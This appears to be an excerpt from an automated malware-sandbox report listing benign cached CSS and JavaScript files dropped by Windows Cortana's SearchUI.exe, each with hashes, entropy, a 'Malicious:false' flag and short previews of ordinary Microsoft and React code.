                                                                            Preview: z{a:1}
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\YFRiFdAq8JMFRbEqynlPcrVqvb4[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1515
                                                                            Entropy (8bit):5.095845525337584
                                                                            Encrypted:false
                                                                            SSDEEP:24:FhMzkuYmRdyVYu8nVHcJDDOXOI6bslnTUGqqJlnCz:3Mr1RdyVvUgDQFTkCQ
                                                                            MD5:08E47D1329ABE9AEAD433A8B2C4104B9
                                                                            SHA1:2A346278752888ED07A4E25CBD84B446BD6000DB
                                                                            SHA-256:D0373F0C4B0A4A7B1400C7388B3E37FDB96C2802BA9E98A9880F16094038DFBE
                                                                            SHA-512:51EF2C1093851C6B387EFF7FB2B28C07974BD80821C1F64555F168ADAD248DFC076699A21C8352A6A030091BA15174E1C175B66CFF6FE2B287AA20DBC295CC96
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\Yi3Flkft8YS8nbd9qCHjIlXAHPg.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):45447
                                                                            Entropy (8bit):4.519302585237155
                                                                            Encrypted:false
                                                                            SSDEEP:768:J0IPAyG9+tOMwFqTWbHUSiuAwmvqWf/LyZsXoUklYv/er/r3OwYEFGH0RhB78Wb+:J0IPX3f+Dglat5kmtW
                                                                            MD5:6859B06C69A93BD325D6CDB2A5CECBD4
                                                                            SHA1:5F1B96C6E59054C14D1EE9A3F3A2CBBC70E03B87
                                                                            SHA-256:6A232348034A0564B74D8A293AC8DC15664E26664CD4E071E1D2E740B76D9EC6
                                                                            SHA-512:9166D92CBF6945282259A2CA8D53F6D5986FF81DE3D61C191D44A745B093936E21E71132833CB885A829C9BF9E4CE42618BD5E995B7A24929436615DF35E91ED
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\_ae0cB8fPDMkfSJUO5xUuczSt7E[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):20407
                                                                            Entropy (8bit):5.305440084477046
                                                                            Encrypted:false
                                                                            SSDEEP:384:Kncvz0mcLDICWE8RtoW0W6jYRmUo0YZA9kE:BLo0CWE8RzQUcA9B
                                                                            MD5:DBA3A107C2F712A09965545FB5C09FAF
                                                                            SHA1:381751A93F9C12887AC67E50BDDF748D7AB99206
                                                                            SHA-256:9E0E1DFB8EA8D029C69BCAD4CEDC7D8981FAF9E2C915616FB740F2EEFDCD30EE
                                                                            SHA-512:B1FA5EB1AF33900488910DCAB2FD450A88810C50CF1C9DFF2ADFE5A514F9449B4D06A667FD010347B6D0B88B88EB7765A929D893E5ADE8F83AE3FD4FE1EB1F3A
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\nE8O_74eRxPGRZXa8IWMjNlvBlM.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):105581
                                                                            Entropy (8bit):6.295327137871007
                                                                            Encrypted:false
                                                                            SSDEEP:1536:KhbNqk75qk7mpGgK+x+HBCtXHdT3LoWw639QO/xbmNiMhfytmGI5bbFZjKj2GgAe:HTIBCtXHGWwsiiyf1P6gAe
                                                                            MD5:6C33E8E7D7B48FB45E591620419B7BCD
                                                                            SHA1:E12DDC6EBC41D9CAF90D5209661B088FCEF7444B
                                                                            SHA-256:8F5D7626F779AFCA70AFB53367B58A0EBD34A98EF97B1D090F04D853BBD19B7D
                                                                            SHA-512:33A6B0520BD4588FFC7A464383D8A8923DA81074F91A9D9A025CB2B2F4812831CEAA450C55390A340821EE29EC6C2798719E9A9BE135FA58B8CDC9C1A399DC83
                                                                            Malicious:false
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\u0oEvt3OS1WUsDRSPSfTBUMXUaQ.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):55911
                                                                            Entropy (8bit):5.115344580288744
                                                                            Encrypted:false
                                                                            SSDEEP:768:gduBggnd/KAcLY7E++ZcHZUQ5j/p0AL/uTYMHJo1TeOUXhW+G9QgzyHc:gzZKZhMyT+XnG9Pzy8
                                                                            MD5:F9F991415FEEC8D1A36A3EDFFD46E3A4
                                                                            SHA1:53135BD81A926596F546DD418F1E19499B688603
                                                                            SHA-256:02186AF7EBDA2799AF5B71E92758483522E54D6D023735B80C0EEB1415DCA09C
                                                                            SHA-512:082C5043F156B7E7A5E634DA1AEC057FAD0F89ECD83E1918B20CA371FF4961C3095A7A3667EEBAF6C4D2FA5887F9D37D5E8DC7A3C6C29FE8E1057535EEA38D57
                                                                            Malicious:false
                                                                            Preview: var __assign,__extends,__spreadArrays,WSB;(function(n){var t;(function(n){function t(){for(var t,r,u,n,f,e=[],i=0;i<arguments.length;i++)e[i]=arguments[i];for(t=[],r=0,u=e;r<u.length;r++)if(n=u[r],n)if(typeof n=="string")t.push(n);else for(f in n)n[f]&&t.push(f);return t.length>0?t.join(" "):null}function i(n){return ThresholdUtilities.getUrlParameter(location.search,"isTest")?n:undefined}n.ViewData={};n.classNames=t;n.whenTestHooks=i})(t=n.View||(n.View={}))})(WSB||(WSB={}));__extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),function(n){var t;(function(n){var t=function(n){function t(){return n!==null&&n.apply(this,arguments)||this}return __extends(t,n),t.prototype.componentDidMo
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\x9YbPXmr_162ZB7uPO0Z384g334[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):1762026
                                                                            Entropy (8bit):6.274276642853282
                                                                            Encrypted:false
                                                                            SSDEEP:24576:CwPD26QWjvUe7uDD0DDXp7lv5ib6uxsvgwDgiZO:CmDHQWjvUe7uDDADFlv5ssgwDgi0
                                                                            MD5:6C78E4B767C0BB763B5947B27B171ADF
                                                                            SHA1:94F4CBB7C9C438DBB5A0F95510E9EEC5990CE19C
                                                                            SHA-256:865DBF4B0B0C65B06FE7D1F7194DD0F5A404BF505089069A2C51EC00634643AE
                                                                            SHA-512:7C990856C3E8F8E6E833780D978BBFD2773C75A2D5736A341754F22DB84C01A22F0CA6A9C66BA307D2AD3979A0A95ADDE18C038E93ED2125CAF4D989594B344C
                                                                            Malicious:false
                                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"WsbLocStrings",namespace:"WindowsSearchBox"},{AadAccount:t[0],AcceptButtonOK:t[1],AcknowledgeFlyoutText:t[2],ActionsSection:t[3],AddAadAccount:t[4],AddingScopeNarratorText:t[5],AddingScopeNarratorTextAll2:t[6],AddMicrosoftAccount:t[7],Album:t[8],App:t[9],Artist:t[10],Author:t[11],AvailableAccounts:t[12],BestMatch:t[13],BestMatchFor:t[14],BingImageAPIError:t[15],BingImageLeftCarousel:t[16],BingImageOfDay:t[17],BingImageRightCarousel:t[18],Build:t[19],Cancel:t[20],Clear:t[21],CloudSearch:t[22],CommandGroup:t[23],Company:t[24],ConnectedAccount:t[25],ConnectedAccounts:t[26],ContactGroup:t[27],Content:t[28],ContextMenu:t[29],ControlPanelAnnotation:t[30],CopyDetails:t[31],CopyFullPath:t[32],CortanaAnnotation_Email:t[33],CortanaGroup:t[34],CustomizeSearchHome:t[35],DesktopAppAnnotation:t[36],DirectNavSuggestion:t[37],DismissBingImage:t[38],DismissFlyout:t[39],DismissUpsell:t[40],EdgeUpsellButtonMessage:t[41],Ed
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\BLQZTUOA\zEQqhwKoETyGdQapOnP2uL1FFF0.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):202174
                                                                            Entropy (8bit):4.353086485551748
                                                                            Encrypted:false
                                                                            SSDEEP:1536:nHHWGK3LUfMkjT35OqPrmqsoHh/yKdei6sBpxrjkwT6qt1SgtzjrsisQ1JLgRHX:2V
                                                                            MD5:30F68A3EA9F8FE63101E59CED32FA3E7
                                                                            SHA1:0450964533A5363F20FD7A7AE16821CDFC1FCC1D
                                                                            SHA-256:90FCCF6342D5BCFDE3F69F88B80253EC694B9B901CC55FD84A2E0C6E0FF05CAF
                                                                            SHA-512:F994377757539611FE2781B6AEEDCFE2B2C7073516C0F3887C0FD836E1ED69066DAABE7065DAE1FC4AA071F8F5080939591B3EBD4642B1EAA42C7B25C2003349
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){var t;(function(n){var t;(function(n){function t(n,t){return n[t]?n[t]:0}function i(n){return t(n,282)>.3896?t(n,282)>.38961?t(n,267)>.6104?t(n,39)>.0145?t(n,282)>.66669?t(n,38)>7124751?t(n,103)>.99997?.49246:.46311:.42968:.2235:t(n,3)>.03371?.4983:t(n,282)>.62505?t(n,25)>.503?t(n,47)>2.5?.44633:.30993:t(n,38)>223508416?.47784:t(n,269)>4502?t(n,269)>4565?.47772:t(n,284)>1.5?t(n,103)>.99997?.49992:.4902:.4969:.45473:.15382:t(n,267)>.61031?-.49998:.23231:.48906:t(n,0)>.50822?t(n,266)>.00112?-.29242:t(n,41)>.9715?.42523:t(n,41)>.3765?t(n,421)>.71793?t(n,38)>67927560?.44213:.43113:.3727:t(n,24)>.1855?-.031:.35364:t(n,103)>.98373?t(n,421)>.69234?t(n,266)>.00112?-.08047:.41851:t(n,94)>.7673?.4414:t(n,38)>5528556?t(n,94)>.17559?t(n,40)>.1685?.19613:-.26247:-.28885:.21078:t(n,266)>.24569?t(n,1)>.5?t(n,0)>.00477?t(n,266)>.25463?-.43181:t(n,264)>.53942?-.49933:-.27443:t(n,264)>.53942?t(n,266)>.25463?-.46023:-.49705:-.45348:t(n,38)>694628928?t(n,41)>.2425?t(n,267)>.6104?-.441
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\98-tFzBbrLP3oaKdmZtyZ4BBBI4.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                            Category:dropped
                                                                            Size (bytes):121609
                                                                            Entropy (8bit):5.370285863147917
                                                                            Encrypted:false
                                                                            SSDEEP:3072:wKXX4GkTzrQcDhJYoGWvDRBaLr9FpKFV8fUkFUkZ86E:wKuLvEFSiz8j
                                                                            MD5:129776DB6BA6BEA4AF70CDB1EA56942A
                                                                            SHA1:12BFE666C0B57B134E7B8B88BCF1A0C3B5DCF3CD
                                                                            SHA-256:2D55886903198E35295B8E90738DA47859837BABA26D47E15BAC87F90EE608D3
                                                                            SHA-512:AEDF99A152B97BE6A57F0D1FB1DD43B0BB69508EAE65B3A054024CD9E5DD59670EBEAFF6CE7525E2B7263BBD7C963C30659628F9A2DF16410674871538DEF94B
                                                                            Malicious:false
                                                                            Preview: /*! Copyright (c) Microsoft Corporation. All Rights Reserved. Licensed under the MIT License. */.var WinJS_Init=function(n,t){var i=typeof n!="undefined"?n:typeof t!="undefined"?t:typeof global!="undefined"?global:{};(function(n){typeof define=="function"&&define.amd?define([],n):(i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StartTM"),typeof exports=="object"&&typeof exports.nodeName!="string"?n():n(i.WinJS),i.msWriteProfilerMark&&msWriteProfilerMark("WinJS.4.4 4.4.0.winjs.2016.5.19 base.js,StopTM"))})(function(){var u,r;return function(){"use strict";function t(n,t){n=n||"";var i=n.split("/");return i.pop(),t.map(function(n){if(n[0]==="."){var r=n.split("/"),t=i.slice(0);return r.forEach(function(n){n===".."?t.pop():n!=="."&&t.push(n)}),t.join("/")}return n})}function f(r,f,e){return r.map(function(r){if(r==="exports")return e;if(r==="require")return function(n,i){u(t(f,n),i)};var o=n[r];if(!o)throw new Error("Undefined dependency: "+r);return o
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\BCoT3iZA2miR3X-hd4kw6B9y1DI.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):44728
                                                                            Entropy (8bit):5.5805883446878966
                                                                            Encrypted:false
                                                                            SSDEEP:768:eaCiT8vK9dy5/UFrI09P65DeyYJHquTLJlvlLtaupJ:APK9A5/UFrlRiDeyYJLLt3
                                                                            MD5:050EA448D5EBC56137F8530780ED7281
                                                                            SHA1:320C83310C58A928A5D4B838754F706655EAC373
                                                                            SHA-256:6CDEE6BF3359EFD459B9EAADD89DE46924D4A2F4794D30E43AE31A543B1E3479
                                                                            SHA-512:B7627B56E6D200FD0532165EF537C0CAA48AFB30F7B98E0F4D8A003FB497939D61251D3C9F0356424C44FA8D34725C20689691D1673F60ECE2317692D5E0C0EF
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){function h(n){return n.toLocaleLowerCase().replace(l,"").trim()}function e(n,t,i,r,u){if(!n)return i;if(typeof n!="string")try{return{content:URL.createObjectURL(n),type:0,bgColor:r}}catch(f){return SharedLogHelper.LogError("convertToHtmlImage "+t,u,f),i}else return{content:n,type:0,bgColor:r}}var c="data:img/png;base64,
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\Cj4mQnDN_eMyYEqsEbjRrJ2Ttec.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\W2hOpEntGkVdY-X4J7A-7qVIVkM.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):61296
                                                                            Entropy (8bit):5.2106846676753555
                                                                            Encrypted:false
                                                                            SSDEEP:1536:JLKXX6+Bm3gjQtskZDWrTz1qscdLkIeW9Ac2HVNe0UkFZsxXn5WGJChIx1D4n8f:9KXqnkKmc2wh5WGJChqf
                                                                            MD5:9DE07063B8DAD6F4C5B80419A42872A1
                                                                            SHA1:BA4BE19DA749A38F7C1913420DD12B9435071CDB
                                                                            SHA-256:ABA985808F2FEA1ECE67DC6BC0733EB53A45AFF413F60AE13A038B9ABC7ECF8A
                                                                            SHA-512:CDBF84DDC1E0BACDBEEC788DBABE1433C4E58A453AD3A7566899CEADFF6D0D7EEC72D5CD86B8A68B0C2E029DD2BE3F3FC65573A535D05A4093C2C6609FE911C8
                                                                            Malicious:false
                                                                            Preview: var WSB;(function(n){function bi(n,i){var r=[],u,f;if(i)if(n)r=i.slice();else{u=function(n){var t=i.find(function(t){return t.verb&&t.verb.toLocaleLowerCase()==n.toLocaleLowerCase()});t&&r.push(t)};for(f in t)u(f)}return r}function ki(n){return n?n.filter(function(n){return!n.verb||n.verb.toLowerCase()!="open"}):[]}function f(t,i,r,u,f,e){e()&&(t=t.slice(),i.getExtraVerbsAsync?n.Promise.safeChain("getExtraVerbsAsync",function(){return i.getExtraVerbsAsync(u)},function(n){return h(k(t,n,!0),i,u,f,e)},function(){return h(t,i,u,f,e)},null,r):h(t,i,u,f,e))}function h(n,t,i,r,u){if(u()){var f=t.getExtraVerbs?k(n,t.getExtraVerbs(i),!1):n;f[0]==v&&f.shift();r(f)}}function di(i,r,u,f){return i.map(function(i){var e,o,s,h;if(i.verb){switch(i.verb.toLocaleLowerCase()){case at:e="PinnedToStart";break;case w:e="PinnedToTaskbar";break;case vt:e="UnpinnedFromStart";break;case b:e="UnpinnedFromTaskbar";break;case lt:o="UninstallConfirmation";e="UninstallationInProgress"}return s=function(t){t();n.Run
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\jhP1uapRf8Z8Qb959t11DNTsvB8.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):94820
                                                                            Entropy (8bit):5.395085534401416
                                                                            Encrypted:false
                                                                            SSDEEP:1536:pSiK8U0NfNWx/mrV+vR1f1fyaSDUQsdObzFcFFUHZy:FV+rf1DQdRcDqy
                                                                            MD5:95029A2B8ED04C57F44599682E9CE9C6
                                                                            SHA1:1E4A4BBEC5E408C925BB30FEFA2F7F1E5F6FEBBA
                                                                            SHA-256:15EDF8C630F285A9B9D9033D867F4FB1D5288AD3BE707F31FB3BF7EDFA54EAEA
                                                                            SHA-512:3C1F3EAA0E2D26D8CF854714E4BA4AF36B102D7AA8CE4138734406BABCD54DC3002EE31A3540009EA7E2C8C8DC3C8CB2CE6E753F410E6C3A0EF055A1E362A608
                                                                            Malicious:false
                                                                            Preview: /** @license React v16.1.1.. * react-dom.production.min.js.. *.. * Copyright (c) 2013-present, Facebook, Inc... *.. * This source code is licensed under the MIT license found in the.. * LICENSE file in the root directory of this source tree... */../*.. Modernizr 3.0.0pre (Custom Build) | MIT..*/..'use strict';(function(ea,l){"object"===typeof exports&&"undefined"!==typeof module?module.exports=l(require("react")):"function"===typeof define&&define.amd?define(["react"],l):ea.ReactDOM=l(ea.React)})(this,function(ea){function l(a){for(var b=arguments.length-1,c="Minified React error #"+a+"; visit http://facebook.github.io/react/docs/error-decoder.html?invariant\x3d"+a,d=0;d<b;d++)c+="\x26args[]\x3d"+encodeURIComponent(arguments[d+1]);b=Error(c+" for the full message or use the non-minified dev environment for full errors and additional helpful warnings.");..b.name="Invariant Violation";b.framesToPop=1;throw b;}function oa(a,b){return(a&b)===b}function Qc(a,b){if(Rc.hasOwnProperty(a)||2<a.
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\p_H40Ndq102p2Socno0_V88cqhw[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8313
                                                                            Entropy (8bit):6.052018977754187
                                                                            Encrypted:false
                                                                            SSDEEP:192:9Acfyf9Kn8i/kzSRS7cb8xM/Qbs3CyzSz/Wp:Wcfyf9K8i/kzSRycbdQbsWLWp
                                                                            MD5:ABF5B9B940857FBD14B60DEA87CCB55F
                                                                            SHA1:8A8AA1FF59E26E1C9E5137269630CA25DA231F3E
                                                                            SHA-256:402598AD8D9469816D4AA4E7DF4957B8A01AC03BF09A9AFED279E45777B046C8
                                                                            SHA-512:F3B556775EF65D0836E3B593867DA0194F0D2E67F78CFEFF99218851466A7F7E6364369194735FFDC22021175A8959B05F71F959D968897812DDB1EAB5FACE0A
                                                                            Malicious:false
                                                                            Preview: (function(n,t){function i(n,t){return LocStringManager.register({uiCulture:n,name:"MicrosoftSearch",namespace:"WindowsSearchBox"},{MsbPeopleContacts:t[0],MsbPeopleGroups:t[1],MsbReverifyAccount:t[2],MsbVerifyAccount:t[3]}),i}return i(n,t)})("ar",[".... .......",".........",".... .. ..... ..... .. ....... ..... .. {0}",".... .. ..... ..... .. ....... ....."])("bg",["........",".....",".......... ....... .., .. .. ....... .......... .. ........ .. .. {0}",".......... ....... .. .. ....... . ......... .........."])("ca",["Contactes","Grups","Verifiqueu el compte per cercar informaci. de la feina des de {0}","Verifiqueu el compte per cercar informaci. de la feina"])("cs",["Kontakty","Skupiny","Chcete-li vyhledat pracovn. informace z adresy {0}, ov..te sv.j ..et","Chcete-li vyhledat pracov
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\tVGM8TyKXWdpDHuIvJZ45J_RvyM.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):65035
                                                                            Entropy (8bit):5.41756307211032
                                                                            Encrypted:false
                                                                            SSDEEP:1536:bpJDABkWmvRKLVGlnk+6hvbnKuw5nG0ph+pjr7iIBI3vJGsj0wJZ:bTDAp6611I0q
                                                                            MD5:B1409256D12728940F594BE1DFE4C8E8
                                                                            SHA1:19E30D2938F9A53F4C30A7141C3E9B5BD9AD37DC
                                                                            SHA-256:CD6D3F0A75ADD15D6698F973B8B17DD4BABA4D320DB94C4F9E566DBA399D4C8B
                                                                            SHA-512:D739A0794233BDCF857FF8C5118A0968343DAF94A5FDBEBFF22AC39F34B044C7B2562689CF10677A9921CDF8C9EFAFD11CDB17F65C473FB6A25888F0C1F97409
                                                                            Malicious:false
                                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){var i="NT",p="NF",t="https://substrate.office.com{0}/api/v1/",w=t+"events",o=t+"init",b=t+"suggestions?query=",k=t+"query",d=t+"recommendations",s="SubstrateSearchService",g="https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{0}?Protocol={1}",r="AutoDiscoveryKey",h="gwsflt.",nt="textdecorations",c="scenario",tt="setflight",it="debug",l="entitytypes",rt="1",ut="scopes",ft="people.directorysearch",et="Authorization",f="Content-Type",ot="X-AnchorMailbox",st="X-Client-Language",ht="X-Client-LocalTime",a="Client-Request-Id",v="User-Agent",ct="X-Debug-ExternalExp",lt="X-Client-Flights"
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\IZZ4D0Z1\tq3wytne-N9U8sOc3W2KXA4Dmtw.br[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:exported SGML document, UTF-8 Unicode text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):205495
                                                                            Entropy (8bit):5.318795383032699
                                                                            Encrypted:false
                                                                            SSDEEP:3072:4EB29xxDxpFEnPluRupigfdhl6qLayhQ/Dsl3JrMdsxYBDIBkb:7B29x9+vfdGGJrMdCYBDIBkb
                                                                            MD5:63F41317FD3165A980E317BF7DC40D96
                                                                            SHA1:AF4BBB3D1ECB50715F76E3D8E4FB26C1A234A6F5
                                                                            SHA-256:C563126353575F85D1E7A447C3FD3957179B0D6DBB2A06B758906A042881172B
                                                                            SHA-512:9775B3AE474A3D10B5B2D9DF4EBFDEB7CAEB59852AA707349AE6B49E8041A9C90497CA6A29E011B5E64977E481515F51A468C8CF7B4282F6A5D801941CF1A1B6
                                                                            Malicious:false
                                                                            Preview: var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)t.hasOwnProperty(i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),__spreadArrays,WSB;(function(n){function f(t,r,u,f,e,o,s,h){i(t,r,u,function(t){var i=null;t.status==200&&(i=t.responseText?n.safeExecute(function(){return JSON.parse(t.responseText)},"JSON.parse"):{success:!0});f(i)},e,o,s,h)}function i(i,r,u,f,e,o,s,h,c){var l=c&&_w.XMLHttpRequest?new XMLHttpRequest:sj_gx(),v,a;try{l.open(u?"POST":"GET",i,!0)}catch(y){SharedLogHelper.LogError("fetchUrl",i,y);f&&f({responseText:"",contentType:"",status:-1,result:3});return}if(r)for(v in r)l.setRequestHeader(v,r[v]);e&&(a=e.register(function(){return l.abort()},!1,"xhr abort"));n.config.useEventListeners?(l.addEventListener("load",function(){t
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\-DaYvsNPmANQqNt2gIDIqo1iPTw[1].js
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:UTF-8 Unicode text, with very long lines
                                                                            Category:dropped
                                                                            Size (bytes):52948
                                                                            Entropy (8bit):5.524952238551884
                                                                            Encrypted:false
                                                                            SSDEEP:1536:CeAy8XLTUO88FCSO6wlci0ibiIiHiU/cppI+TS:CrLT3CSO2i0ibiIiHiowTS
                                                                            MD5:A94E1BBCFD4435B38F36AC15A4376359
                                                                            SHA1:7B30C014B2A57DF5F8397D33F73C7BDF9924C7AD
                                                                            SHA-256:A621699D8842C74177D34E0EA77A477EE82B3FAAD2F52E18CCA9364106E8AF63
                                                                            SHA-512:FA420A51069886EA0113B6E0695FDFCC8B0CEFBEED30C1E646BD91C5C5CD24E8CEDAD649F35F9ECB39B72779370255447F6E38E0F96B3DE91EC9E1A2B4D96EDE
                                                                            Malicious:false
                                                                            Preview: var __spreadArrays,CoreUtilities,LoggerModule,VisibilityChangeHelperModule,HitHighlightingParserImpl,DataSourceLayoutManager,ThresholdDiagnosticsProd,FailedPromise,ThresholdUtilitiesM2;_w.EventsToDuplicate=[];_w.useSharedLocalStorage=!1;define("shared",["require","exports"],function(n,t){function s(n,t){for(var r=n.length,i=0;i<r;i++)t(n[i])}function r(n){for(var i=[],t=1;t<arguments.length;t++)i[t-1]=arguments[t];return function(){n.apply(null,i)}}function u(n){i&&event&&(event.returnValue=!1);n&&typeof n.preventDefault=="function"&&n.preventDefault()}function f(n){i&&event&&(event.cancelBubble=!0);n&&typeof n.stopPropagation=="function"&&n.stopPropagation()}function e(n,t,i){for(var r=0;n&&n.offsetParent&&n!=(i||document.body);)r+=n["offset"+t],n=n.offsetParent;return r}function o(){return(new Date).getTime()}function h(n){return i?event:n}function c(n){return i?event?event.srcElement:null:n.target}function l(n){return i?event?event.fromElement:null:n.relatedTarget}function a(n){retu
                                                                            C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Cortana_cw5n1h2txyewy\AC\INetCache\LSXA5TU8\BBDBvk5AokRBwrox4FNOb3dTd1E[1].css
                                                                            Process:C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe
                                                                            File Type:ASCII text, with very long lines, with no line terminators
                                                                            Category:dropped
                                                                            Size (bytes):7671
                                                                            Entropy (8bit):5.15245035345059
                                                                            Encrypted:false
                                                                            SSDEEP:192:UADGOuMWZEWjhd7FeyLCL6p7tkJ/srOk3aG3ek1EWTnl/kv9:UuJGcMJfLO
                                                                            MD5:A1F32F25C7C924B918EA54A86670D731
